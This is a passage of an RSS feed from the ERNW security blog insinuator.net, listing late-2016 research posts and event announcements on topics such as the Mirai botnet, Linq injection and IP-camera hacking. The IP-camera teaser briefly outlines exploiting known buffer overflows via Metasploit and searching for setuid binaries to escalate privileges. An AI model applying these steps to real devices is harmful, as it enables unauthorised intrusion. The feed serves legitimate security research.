      <description>&lt;p&gt;While doing heap research on Linux processes (results are going to be published soon), I came across the bot from the Mirai Botnet. As already mentioned in the blog post by &lt;a href=&#34;https://insinuator.net/2016/10/a-quick-insight-into-the-mirai-botnet/&#34;&gt;Brian&lt;/a&gt;, the Mirai bot uses obfuscated configuration data which contains e.g. the CnC server. When now confronted only with a bot (e.g. in the context of a running task or the ELF binary), but without the according source code, the decryption of this configuration data for e.g. incident analysis purposes might not be easily possible (with the python script from the blog post), if the key has been changed.&lt;br&gt;&#xA;But in this case that is not a problem at all, because&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2017 – First Talks Published</title>
      <link>https://insinuator.net/2016/12/telcosecday-2017-first-talks-published/</link>
      <pubDate>Thu, 08 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/telcosecday-2017-first-talks-published/</guid>
      <description>&lt;p&gt;Even if the CFP for TelcoSecDay 2017 is officially closed, I am still getting mails in. First of all: thank you for all your great feedback! As the TelcoSecDay is a complimentary and non-public event with highly specialized topics, it only works by sharing knowledge with each other. But please keep in mind that the speaker-slots are limited and I have to make a decision at some point of time.&lt;br&gt;&#xA;Anyhow, I am looking forward for a great event and I am proud to publish the first accepted talks:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research Diary: Bluetooth. Part 2</title>
      <link>https://insinuator.net/2016/12/research-diary-bluetooth.-part-2/</link>
      <pubDate>Wed, 07 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/research-diary-bluetooth.-part-2/</guid>
      <description>&lt;p&gt;Recently we posted &lt;a href=&#34;https://insinuator.net/2016/11/research-diary-bluetooth/&#34;&gt;first part&lt;/a&gt; of our Bluetooth research diary. Today, we want to continue on that topic and tell you about Bluetooth proxying and packet replay with a new tool.&lt;/p&gt;&#xA;&lt;p&gt;This time we had a new gadget to play with: our colleague Florian Grunow shared with us a curious IoT device – Bluetooth socks… real socks that you control with an app to heat your feet. The future is here… 😉&lt;br&gt;&#xA;&lt;img src=&#34;IMG_20161129_095613.jpg&#34; alt=&#34;img_20161129_095613&#34;&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analyzing yet another Smart Home device</title>
      <link>https://insinuator.net/2016/12/analyzing-yet-another-smart-home-device/</link>
      <pubDate>Mon, 05 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/analyzing-yet-another-smart-home-device/</guid>
      <description>&lt;p&gt;As you have probably already recognized, some of us here at ERNW are doing research in the area of smart home technologies e.g. KNX. Recently, we took a deeper look into a device which is used to control a smart home system produced by the vendor BAB TECHNOLOGIE GmbH called “eibPort”. This device can be used to control smart home systems based on different technologies e.g. EnoCean or KNX depending on the version of the device. The eibPort comes with a visualization running on a webserver to control the whole system e.g. open or close windows, changing the temperature in different rooms or turning the alarm system on or off by simply clicking on symbols. The following screenshots illustrate an example of such a visualization:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research Diary: Blue Coat</title>
      <link>https://insinuator.net/2016/12/research-diary-blue-coat/</link>
      <pubDate>Mon, 05 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/research-diary-blue-coat/</guid>
      <description>&lt;p&gt;As a part of our research time here at ERNW, last week we had an interesting time looking at one of the widespread and commonly adopted proxy appliance by many organizations Blue Coat Secure Gateway.&lt;/p&gt;&#xA;&lt;h1 id=&#34;introduction&#34;&gt;Introduction&lt;/h1&gt;&#xA;&lt;p&gt;The Blue Coat proxy Secure Gateway (SG) has been already in the market since 2001 [1]. The main aim of introducing the appliance was to achieve the following goals [2]:&lt;br&gt;&#xA;• High performance optimization.&lt;br&gt;&#xA;• Increasing the security measurements, by introducing malware/spyware protections, web based filtering, virus scanning and more.&lt;br&gt;&#xA;• Flexible Access Control capabilities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Notes from the Lab – BlackNurse in the IPv6 Era</title>
      <link>https://insinuator.net/2016/12/some-notes-from-the-lab-blacknurse-in-the-ipv6-era/</link>
      <pubDate>Mon, 05 Dec 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/12/some-notes-from-the-lab-blacknurse-in-the-ipv6-era/</guid>
      <description>&lt;p&gt;Since BlackNurse was released on 10th of November, we asked ourselves whether this problem does also apply to ICMPv6 traffic. To answer this question, Christian Tanck (one of our students) build a lab with several firewall appliances. Kudos to him for testing and the following blog post.&lt;/p&gt;&#xA;&lt;h3 id=&#34;intro&#34;&gt;Intro&lt;/h3&gt;&#xA;&lt;p&gt;&lt;img src=&#34;bl1.png&#34; alt=&#34;bl1&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;On 10^(th) of November, 2016 the &lt;a href=&#34;https://www.trusted-introducer.org/directory/teams/tdc-soc.html&#34;&gt;TDC Security Operations Center in Denmark&lt;/a&gt; published the BlackNurse Denial of Service Attack Report as an &lt;a href=&#34;http://soc.tdc.dk/blacknurse/blacknurse.pdf&#34;&gt;PDF download&lt;/a&gt; on their website and a &lt;a href=&#34;http://www.netresec.com/?page=Blog&amp;amp;month=2016-11&amp;amp;post=BlackNurse-Denial-of-Service-Attack&#34;&gt;blog post&lt;/a&gt; written by Erik Hjelmvik from NETRESEC. He was involved in the project by helping with the analysis of packet dumps, testing different systems, with ideas for test scenarios and at least inspired me with his blog post on how to build a test lab described later in this post. The attack on its own was discovered by the TDC analysts Kenneth B. Jørgensen and Lenny Hansson.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research Diary: IP-Cameras Part 2</title>
      <link>https://insinuator.net/2016/11/research-diary-ip-cameras-part-2/</link>
      <pubDate>Wed, 30 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/research-diary-ip-cameras-part-2/</guid>
      <description>&lt;p&gt;Hi everybody,&lt;br&gt;&#xA;This is the second entry in our research diary on IP cameras. If you haven’t done so yet, you should read the first entry in advance. This time we focused more on analysis and exploitation.&lt;/p&gt;&#xA;&lt;h2 id=&#34;another-entry-vector&#34;&gt;&lt;a href=&#34;#another-entry-vector&#34;&gt;&lt;/a&gt;Another entry vector&lt;/h2&gt;&#xA;&lt;p&gt;After running a vulnerability scan on both devices, it was revealed that the M1033 has multiple buffer overflow vulnerabilities (CVE-2012-5958 to CVE-2012-5965), which are readily exploitable via Metasploit. This gave us another shell (in addition to the root shell mentioned in the last post), though this time it was not a root shell. By using the &lt;em&gt;find&lt;/em&gt; command, we searched for executables having the &lt;em&gt;setuid&lt;/em&gt; or &lt;em&gt;setgid&lt;/em&gt; bit set. We hoped to use one of those to escalate privileges. To do so yourself add the parameter &lt;em&gt;-perm -4000&lt;/em&gt; to &lt;em&gt;find&lt;/em&gt; and it will search for files having the setuid bit set. If you try that on your own unix-like device, for example it should yield &lt;em&gt;/bin/passwd&lt;/em&gt; which is perfectly reasonable as you’re able to change your password without being root.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Defending Democracy</title>
      <link>https://insinuator.net/2016/11/defending-democracy/</link>
      <pubDate>Thu, 24 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/defending-democracy/</guid>
      <description>&lt;p&gt;I recently had the pleasure to attend two events organized by the &lt;a href=&#34;https://www.esmt.org/faculty-research/centers-chairs-and-institutes/digital-society-institute-dsi&#34;&gt;Digital Society Institute&lt;/a&gt;, one was a &lt;a href=&#34;https://www.esmt.org/node/26449&#34;&gt;workshop on software vulnerabilities&lt;/a&gt; and one was their annual &lt;a href=&#34;https://www.esmt.org/faculty-research/events/conferences-and-workshops/digital-society-conference-2016-defending&#34;&gt;conference&lt;/a&gt;. For both events I delivered input on the security of security products and their evaluation (slides can be found &lt;a href=&#34;https://www.ernw.de/download/ERNWResearch_CritivalViewOnSecProducts_mluft.pdf&#34;&gt;here&lt;/a&gt;). The DSI did a great job of assembling people from various areas (e.g. industry, academia, politics, and research) so there was a lot of input which is not covered by conferences I usually attend. The workshop I attended also resulted in a short policy recommendation when it comes to the security of security products which can be found &lt;a href=&#34;https://www.esmt.org/sites/default/files/2016_dsi_ipr_vulnerabilities-in-it-security-products.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CCS’16 – Day 2 – 25th October 2016</title>
      <link>https://insinuator.net/2016/11/ccs16-day-2-25th-october-2016/</link>
      <pubDate>Wed, 23 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/ccs16-day-2-25th-october-2016/</guid>
      <description>&lt;p&gt;Hello again.&lt;/p&gt;&#xA;&lt;p&gt;Andrei Costin (at &lt;a href=&#34;http://firmware.re/&#34;&gt;http://firmware.re&lt;/a&gt; project) is here, and this is the second post from a series of guest postings courtesy of ERNW (thanks Niki and Enno!).&lt;/p&gt;&#xA;&lt;p&gt;Few days ago, the first CCS’16 summarization post went online: &lt;a href=&#34;https://insinuator.net/2016/11/introduction-ccs16-day-1-24th-october-2016/&#34;&gt;https://insinuator.net/2016/11/introduction-ccs16-day-1-24th-october-2016/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;It summarized five presentations of the 6th Annual Workshop on Security and Privacy in Smartphones (SPSM’16). In short, it contained presentations on: over-the-top and phone number abuse, smartphone fingerprinting, apps privacy increase and protection/security, and apps privacy ranking.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research Diary: Bluetooth</title>
      <link>https://insinuator.net/2016/11/research-diary-bluetooth/</link>
      <pubDate>Tue, 22 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/research-diary-bluetooth/</guid>
      <description>&lt;p&gt;As you probably know we perform research on a regular base at ERNW.&lt;/p&gt;&#xA;&lt;p&gt;We – Olga and Rafael – started with a research project about Bluetooth. Our first goal was to gain some knowledge about the tools used by most Linux systems to communicate with Bluetooth hardware, such as BlueZ. A good help for that was the amazing Bluetooth hacking workshop we had before (check &lt;a href=&#34;https://www.insinuator.net/2016/09/hardware-hacking-week-ernw/&#34;&gt;the link&lt;/a&gt; in our blog!)&lt;/p&gt;&#xA;&lt;p&gt;To get a better understanding of the tools you need some Bluetooth hardware to interact with.&lt;br&gt;&#xA;The hardware we used for our research so far are the very cool TexasInstruments SimpleLink™ Bluetooth low energy/Multi-standard SensorTag (CC2650STK) and a Fitness Wristband found at home.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Research Diary: IP-Cameras</title>
      <link>https://insinuator.net/2016/11/research-diary-ip-cameras/</link>
      <pubDate>Tue, 22 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/research-diary-ip-cameras/</guid>
      <description>&lt;p&gt;As you probably know we perform research on a regular basis at ERNW. This post is the first entry on our – Benjamin’s and Pascal’s – research diary. You might already have seen &lt;a href=&#34;https://insinuator.net/2016/10/setting-up-a-research-environment-for-ip-cameras/&#34;&gt;Oliver’s post on setting up an research environment&lt;/a&gt; or Brian’s posts on IoT botnets (&lt;a href=&#34;https://insinuator.net/2016/10/how-to-become-part-of-an-iot-botnet/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;https://insinuator.net/2016/10/a-quick-insight-into-the-mirai-botnet/&#34;&gt;here&lt;/a&gt;). With that in mind we want to take a look at one of the market leaders for network camera equipment: AXIS.&lt;/p&gt;&#xA;&lt;p&gt;At first we’d like to give a quick overview of our research objects. We bought two cameras, an AXIS M1033-W and an AXIS M3005-V. The M1033’s description states that it is for “small business, hotels, residences and more”. The M3005 has a typical dome design and was actually seen in some customer environments during projects this year.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BlackHoodie 2016</title>
      <link>https://insinuator.net/2016/11/blackhoodie-2016/</link>
      <pubDate>Mon, 21 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/blackhoodie-2016/</guid>
      <description>&lt;p&gt;This year’s &lt;a href=&#34;http://0x1338.blogspot.de/2016/06/that-thing-with-rocking-harder-and.html&#34;&gt;BlackHoodie&lt;/a&gt; workshop rolled out with 28 amazing women from all parts of the world. It was a very vibrant group with students, professionals, engineers, researchers, physicists and what not. This is the second year that &lt;a href=&#34;https://twitter.com/pinkflawd&#34;&gt;Marion Marschalek&lt;/a&gt; is running this reverse engineering workshop exclusively for women. There were a variety of topics that were covered. This includes anti emulation tricks, anti debuggers, packers, obfuscation, encryption/decryption functions, and a lot of fun with IDA.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Considerations on DMZ Design in 2016, Part 3: Some Notes on Firewall Rule Management</title>
      <link>https://insinuator.net/2016/11/considerations-on-dmz-design-in-2016-part-3-some-notes-on-firewall-rule-management/</link>
      <pubDate>Mon, 21 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/considerations-on-dmz-design-in-2016-part-3-some-notes-on-firewall-rule-management/</guid>
      <description>&lt;p&gt;This is the 3rd part of this loose series on considerations of (operating) DMZs in 2016 (part 1 on the role of a DMZ is can be found &lt;a href=&#34;https://insinuator.net/2016/08/considerations-on-dmz-design-in-2016-part-1/&#34;&gt;here&lt;/a&gt;, part 2 on reverse proxies &lt;a href=&#34;https://insinuator.net/2016/09/considerations-on-dmz-design-in-2016-part-2-a-quick-digression-on-reverse-proxies/&#34;&gt;here&lt;/a&gt;).&lt;br&gt;&#xA;Again, I dare to deviate a bit from the plan &amp;amp; order I initially had in mind – today I will cover one process whose maturity may significantly influence the overall security posture of a DMZ environment: firewall rule management.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Introduction &amp; CCS’16 – Day 1 – 24th October 2016</title>
      <link>https://insinuator.net/2016/11/introduction-ccs16-day-1-24th-october-2016/</link>
      <pubDate>Mon, 21 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/introduction-ccs16-day-1-24th-october-2016/</guid>
      <description>&lt;p&gt; I am Andrei Costin (at &lt;a href=&#34;http://firmware.re/&#34;&gt;http://firmware.re&lt;/a&gt; project), and this is the first post from a series of guest postings courtesy of ERNW.&lt;/p&gt;&#xA;&lt;p&gt;Between 24th and 28th October, I had the pleasure and the great opportunity to attend ACM CCS 2016 in Vienna, Austria, where I also presented at the TrustED’16 workshop my paper titled “&lt;a href=&#34;http://dl.acm.org/citation.cfm?id=2995290&#34;&gt;Security of CCTV and Video Surveillance Systems: Threats, Vulnerabilities, Attacks, and Mitigations&lt;/a&gt;”.&lt;/p&gt;&#xA;&lt;p&gt;My attendance throughout the entire ACM CCS 2016 week and my presentation at TrustED was possible thanks to generous support from Enno Rey and ERNW, and I thank them again for this opportunity!&lt;/p&gt;</description>
    </item>
    <item>
      <title>IoT the S is for Secure – Unknown Administration Interface in Wireless Plug</title>
      <link>https://insinuator.net/2016/11/iot-the-s-is-for-secure-unknown-administration-interface-in-wireless-plug/</link>
      <pubDate>Mon, 21 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/iot-the-s-is-for-secure-unknown-administration-interface-in-wireless-plug/</guid>
      <description>&lt;p&gt;Dear Readers,&lt;/p&gt;&#xA;&lt;p&gt;just recently i bought a wireless plug on &lt;a href=&#34;https://www.amazon.de/gp/product/B01LXASIZG/ref=oh_aui_detailpage_o01_s00?ie=UTF8&amp;amp;psc=1&#34;&gt;Amazon&lt;/a&gt; with the main use of controlling my coffee machine with an app. The installation of the wireless plug was quite easy and only requires me to set my Wifi SSID and my passphrase – that’s it. But what happened behind the scenes? I visited the control interface of my router and saw that along with the other devices there was a new one with the network name HF-LPB100 and a local IP address in my case 192.168.0.235. First of all i wondered about the name itself, but ignored that and kept on looking for open ports.&lt;/p&gt;</description>
    </item>
    <item>
      <title>(Securely) Updating Smart Devices / Some Considerations</title>
      <link>https://insinuator.net/2016/11/securely-updating-smart-devices-/-some-considerations/</link>
      <pubDate>Tue, 15 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/securely-updating-smart-devices-/-some-considerations/</guid>
      <description>&lt;p&gt;How to provide updates to IoT devices – yes, I’m aware this might be a overly broad generalization for many different devices – has been the topic of many discussions in the last years (for those interested the papers from the “&lt;a href=&#34;https://www.iab.org/activities/workshops/iotsu/&#34;&gt;Internet of Things Software Update Workshop (IoTSU)&lt;/a&gt;” might be a good starting point).&lt;br&gt;&#xA;Given Matthias and I will moderate the respective session at tomorrow’s &lt;a href=&#34;https://www.troopers.de/iot-insight-summit-2016/iot-insight-summit-2016-overview/&#34;&gt;IoT Insight Summit&lt;/a&gt; I started writing down some points that we consider relevant in this context.&lt;/p&gt;</description>
    </item>
    <item>
      <title>15. Cyber-Sicherheits-Tag</title>
      <link>https://insinuator.net/2016/11/15.-cyber-sicherheits-tag/</link>
      <pubDate>Tue, 08 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/15.-cyber-sicherheits-tag/</guid>
      <description>&lt;p&gt;Today Kevin and I had the pleasure to to present at the German &lt;a href=&#34;https://www.allianz-fuer-cybersicherheit.de/ACS/DE/Erfahrungsaustausch/CST/cur/cst.html&#34;&gt;15. Cyber-Sicherheits-Tag&lt;/a&gt; in &lt;a href=&#34;https://en.wikipedia.org/wiki/Project_Blinkenlights&#34;&gt;Berlin&lt;/a&gt; which is organized by the &lt;a href=&#34;https://www.allianz-fuer-cybersicherheit.de/ACS/DE/Home/startseite.html&#34;&gt;Alliance for Cyber Security&lt;/a&gt;. This iteration covered security aspects of the Internet of Things and we enjoyed some great conversations. The presentations were limited to ten slides and can be found here:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/ERNW_Defense_in_Depth_IoT_kschaller.pdf&#34;&gt;Kevin Schaller – Defense in Depth in IoT&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/ERNWResearch_UpdateManagementAndIoT_mluft.pdf&#34;&gt;Matthias Luft – Update Management in IoT&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Since the slides were supposed to be short and only support the presentation, you still have the chance to get the full content (and even challenge it or ask to dive deeper during the break-out discussions) next week at &lt;a href=&#34;https://www.troopers.de/iot-insight-summit-2016/iot-insight-summit-2016-overview/&#34;&gt;our own IoT event&lt;/a&gt; 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>ITSeCX 2016: Pulling an all-nighter in Austria</title>
      <link>https://insinuator.net/2016/11/itsecx-2016-pulling-an-all-nighter-in-austria/</link>
      <pubDate>Tue, 08 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/itsecx-2016-pulling-an-all-nighter-in-austria/</guid>
      <description>&lt;p&gt;Last Friday I gave a talk at the &lt;a href=&#34;https://itsecx.fhstp.ac.at/&#34;&gt;ITSeCX&lt;/a&gt; in St. Pölten, Austria. The conference, hosted by the local University of Applied Sciences, has already taken place ten times. I don’t know how many people attended this time, 2014 there were about 600; &lt;a href=&#34;http://www.computerwelt.at/news/technologie-strategie/security/detail/artikel/113099-it-secx-2015-eine-nacht-im-zeichen-der-it-security/&#34;&gt;I read somewhere on the net&lt;/a&gt;. There were four tracks and some workshops from 4pm to the conference’s end at midnight. I enjoyed the community-feeling there very much, even though I arrived late. The only talks I saw, were Adrian Dabrowski speaking about the DARPA Cyber Grand Challenge, the finals took part in Las Vegas this August, and the very entertaining end-of-year review from two UAS guys.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Announcing the first 5 talks of TROOPERS17!!!!</title>
      <link>https://insinuator.net/2016/11/announcing-the-first-5-talks-of-troopers17/</link>
      <pubDate>Fri, 04 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/announcing-the-first-5-talks-of-troopers17/</guid>
      <description>&lt;h2&gt;&lt;/h2&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;TROOPERS16&lt;/a&gt; was packed with epic talks from around the world, an unknown evil twin brother appearing, hands-on trainings, and a legendary year for our TROOPERS Charity efforts! If you were there you might be wondering to yourself how could they possibly top it? Well, I am going to let you in on a little secret: Next year is the 10th edition of &lt;a href=&#34;https://www.troopers.de/troopers17/&#34;&gt;TROOPERS&lt;/a&gt;. One DECADE of TROOPERS, and we are pulling out all the stops! Starting with the announcement of the first 5 talks!&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Source Address Selection</title>
      <link>https://insinuator.net/2016/11/ipv6-source-address-selection/</link>
      <pubDate>Wed, 02 Nov 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/11/ipv6-source-address-selection/</guid>
      <description>&lt;p&gt;As we all know an IPv6 enabled host can have multiple addresses. In order to select a source address for a to-be established outbound connection, operating systems implement a source address selection mechanism that evaluates multiple source address candidates and selects the (potentially) best candidate. Criteria for this selection are defined in &lt;a href=&#34;https://tools.ietf.org/rfc/rfc6724.txt&#34;&gt;RFC6724&lt;/a&gt; (which obsoletes RFC 3484).&lt;/p&gt;&#xA;&lt;p&gt;To find out if there are differences as for the way various OSs implement this mechanism we performed a little study whose results can be found in &lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Whitepaper57_IPv6_lab_source_address_selection_signed.pdf&#34;&gt;this whitepaper&lt;/a&gt;. Those differences might be particularly relevant for data center environments or enterprise networks with a variety of heterogeneous client operating systems. If interested in IPv6 in enterprise networks &lt;a href=&#34;https://hm-ts.de/de/1-deutschsprachige-seminare/14-ipv6-in-enterprise-networks20160227140531.html&#34;&gt;this training&lt;/a&gt; that I’ll give in some weeks might be worth attending for some of you, too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2017 – CFP Opens</title>
      <link>https://insinuator.net/2016/10/telcosecday-2017-cfp-opens/</link>
      <pubDate>Sat, 29 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/telcosecday-2017-cfp-opens/</guid>
      <description>&lt;p&gt;For the 6th year in a row, the next TelcoSecDay will take place in 2017 on March 21th. Again, it will be held one day before &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers IT-Security Conference&lt;/a&gt; as an invitation-only event. For those of you who don’t know the TSD, it is organized by ERNW and is aimed at bringing researchers and people from the telecommunication industry together to discuss about current security weaknesses, challenges and strategies. To do so, various topics will be presented during the talks and there will surely be enough time to follow-up in extensive discussions.&lt;br&gt;&#xA;To give you an idea, here’s the &lt;a href=&#34;https://insinuator.net/2016/03/telcosecday-2016-final-agenda-and-more/&#34;&gt;TSD 2016 agenda&lt;/a&gt;, and here’s &lt;a href=&#34;https://insinuator.net/2015/03/final-agenda-of-troopers15-telcosecday/&#34;&gt;the one of 2015&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Day-Con X Recap</title>
      <link>https://insinuator.net/2016/10/day-con-x-recap/</link>
      <pubDate>Thu, 27 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/day-con-x-recap/</guid>
      <description>&lt;p&gt;Just a few days ago I had the pleasure of visiting &lt;a href=&#34;http://day-con.org/&#34;&gt;Day-Con X&lt;/a&gt;. I listened to some great talks in the closed and public sessions. Since the first day was the security summit (closed session) I will just name a few titles with some brief words.&lt;/p&gt;&#xA;&lt;p&gt;Captivating Security – Safety versus Passion (Josh More):&lt;br&gt;&#xA;Was quite interesting to compare the IT-World with zoos.&lt;/p&gt;&#xA;&lt;p&gt;Beyond Embedded (Brittany Postnikoff):&lt;br&gt;&#xA;Robots are fun soon :).&lt;/p&gt;</description>
    </item>
    <item>
      <title>IoT Insight Summit November 15, 2016</title>
      <link>https://insinuator.net/2016/10/iot-insight-summit-november-15-2016/</link>
      <pubDate>Wed, 26 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/iot-insight-summit-november-15-2016/</guid>
      <description>&lt;p&gt;The newest addition to ERNW, ERNW Insight which now hosts &lt;a href=&#34;https://www.troopers.de/troopers17/&#34;&gt;TROOPERS&lt;/a&gt;, is launching a new concept this year. Based on the successful TROOPERS Roundtable sessions, ERNW Insight will host a series events every year covering current and relevant topics in the field of IT Security. While the style of the events may vary the in-depth knowledge sharing that you have come to know from TROOPERS will not!&lt;/p&gt;&#xA;&lt;p&gt;The inaugural event will be our&lt;a href=&#34;https://www.troopers.de/iot-insight-summit-2016/iot-insight-summit-2016-overview/&#34;&gt; IoT Insight Summit&lt;/a&gt;, taking place on November 15, 2016 at the &lt;a href=&#34;https://www.ihg.com/crowneplaza/hotels/us/en/heidelberg/hdbge/hoteldetail&#34;&gt;Crowne Plaza Heidelberg&lt;/a&gt;.  This 1-day event will begin with a keynote and case study from industry experts.  Afterwards, all participants will be divided into five groups of 10 persons each to participate in our “Break Out Sessions”. Every participant  will get the opportunity to attend all 5 Break Out Sessions, where our IT Security moderators will lead discussions on typical problems and solutions in IoT.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering With Radare2 – Part 3</title>
      <link>https://insinuator.net/2016/10/reverse-engineering-with-radare2-part-3/</link>
      <pubDate>Mon, 24 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/reverse-engineering-with-radare2-part-3/</guid>
      <description>&lt;p&gt;Sorry about the larger delay between the previous post and this one, but I was very busy the last weeks.&lt;br&gt;&#xA;(And the technology I wanted to show wasn’t completely implemented in radare2, which means that I had to implement it on my own 😉 ). In case you’re new to this series, you’ll find the previous posts &lt;a href=&#34;https://insinuator.net/tag/radare2/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;As you may already know, we’ll deal with the third challenge today. The purpose for this one is to introduce&lt;br&gt;&#xA;some constructs which are often used in real programs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Journey Into the Depths of VoWiFi Security</title>
      <link>https://insinuator.net/2016/10/a-journey-into-the-depths-of-vowifi-security/</link>
      <pubDate>Thu, 20 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/a-journey-into-the-depths-of-vowifi-security/</guid>
      <description>&lt;p&gt;T-mobile pioneered with the native seamless support for WiFi calling technology embedded within the smartphones. This integrated WiFi calling feature is adopted by most major providers as well as many smartphones today. T-mobile introduced VoWiFi in Germany in May 2016. You can make voice calls that allows to switch between LTE and WiFi networks seamlessly. This post is going to be about security analysis of Voice over WiFi (VoWiFi), another name for WiFi calling, from the user end. Before we get started, let me warn you in advance. If you are not familiar with telecommunication network protocols, then you might get lost in the heavy usage of acronyms and abbreviations. I am sorry about that. But trust me, after a while, you get used to it 🙂 .&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Quick Insight Into the Mirai Botnet</title>
      <link>https://insinuator.net/2016/10/a-quick-insight-into-the-mirai-botnet/</link>
      <pubDate>Thu, 20 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/a-quick-insight-into-the-mirai-botnet/</guid>
      <description>&lt;p&gt;As you might have read, &lt;a href=&#34;https://insinuator.net/2016/10/how-to-become-part-of-an-iot-botnet/&#34;&gt;I recently had a closer look at how easy it actually is to become part of an IoT Botnet&lt;/a&gt;. To start a further discussion and share some of my findings I gave a quick overview at the recent &lt;a href=&#34;http://day-con.org/&#34;&gt;Dayton Security Summit&lt;/a&gt;. The Mirai Botnet was supposed to be one of the case studies here. But the way things go if one starts diving into code…I eventually gave an overview of how the Mirai Bot actually works and what it does. As such: Here a quick summary of the Mirai Botnet bot.&lt;br&gt;&#xA;As described in my previous post, &lt;a href=&#34;https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/&#34;&gt;KrebsonSecurity.com was attacked by a major DDoS attack&lt;/a&gt;. Reaching between 620Gbps and 660Gbps it was the largest documented DDoS attack so far. The attack seemingly resulted from a Botnet called Mirai. Shortly after the attack, a &lt;a href=&#34;https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/&#34;&gt;post on hackforums&lt;/a&gt; claimed to contain the actual source code of just this botnet.&lt;br&gt;&#xA;The &lt;a href=&#34;https://github.com/jgamblin/Mirai-Source-Code&#34;&gt;source code&lt;/a&gt; consists of three projects: The bot itself with its CnC server and a loader component.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Linq Injection – From Attacking Filters to Code Execution</title>
      <link>https://insinuator.net/2016/10/linq-injection-from-attacking-filters-to-code-execution/</link>
      <pubDate>Mon, 17 Oct 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/10/linq-injection-from-attacking-filters-to-code-execution/</guid>
      <description>&lt;p&gt;Some of you (especially the .Net guys) might have heard of the query language Linq (&lt;em&gt;Language Integrated Query&lt;/em&gt;) used by Microsoft .Net applications and web sites. It’s used to access data from various sources like databases, files and internal lists. It can internally transform the accessed data in application objects and provides filter mechanisms similar to SQL. As it is used directly inside the application source code, it will be processed at compile time and not interpreted at runtime. While this provides a great type safety and almost no attack surface for injection attacks (except from possible handling problems in the different backends), it is extremely difficult to implement a dynamic filter system (e.g. for datatables which should allow users to select the column to filter on). That’s probably the reason why Scott Guthrie (Executive Vice President of the Cloud and Enterprise group in Microsoft, also one of the founders of the .Net project) &lt;a href=&#34;https://weblogs.asp.net/scottgu/dynamic-linq-part-1-using-the-linq-dynamic-query-library&#34;&gt;presented&lt;/a&gt; the System.Linq.Dynamic package as part of the VS-2008 samples in 2008. This library allows to build Linq queries at runtime and therefore simplify dynamic filters. But as you may know, dynamic interpretation of languages based on user input is most of the time not the best option….&lt;/p&gt;</description>
    </item>
    <item>
      <title>Setting up a Research Environment for IP Cameras</title>
      <link>https://insinuator.net/2016/10/setting-up-a-research-environment-for-ip-cameras/</link>
      <pubDate>Mon, 17 Oct 2016 00:00:00 +0000</pubDate>
